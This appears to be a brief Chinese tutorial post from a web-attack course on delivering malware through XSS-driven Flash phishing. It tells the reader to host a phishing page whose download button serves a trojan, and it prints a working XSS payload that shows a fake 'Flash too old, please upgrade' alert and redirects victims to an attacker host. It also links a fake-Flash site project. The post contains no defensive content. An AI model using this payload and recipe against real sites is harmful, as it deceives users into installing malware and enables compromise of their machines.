第 54 天:网络攻击与防御-XSS 跨站与 Cookie 窃取与表单劫持与网络钓鱼与可追溯性分析与项目平台框架-XSS 跨站 - 攻击利用 - Flash 网络钓鱼
最编程
2024-04-01 16:54:04
...
部署可访问的钓鱼页面并修改
点击立即下载后,就会下载木马文件
植入XSS代码等待受害者触发
<script>alert('当前浏览器Flash版本过低,请下载升级!');location.href='http://x.x.x.x/flash'</script>
点击确定后就会来到准备好的钓鱼页面,立即下载地址就可以填木马地址
项目地址:https://github.com/r00tSe7en/Fake-flash.cn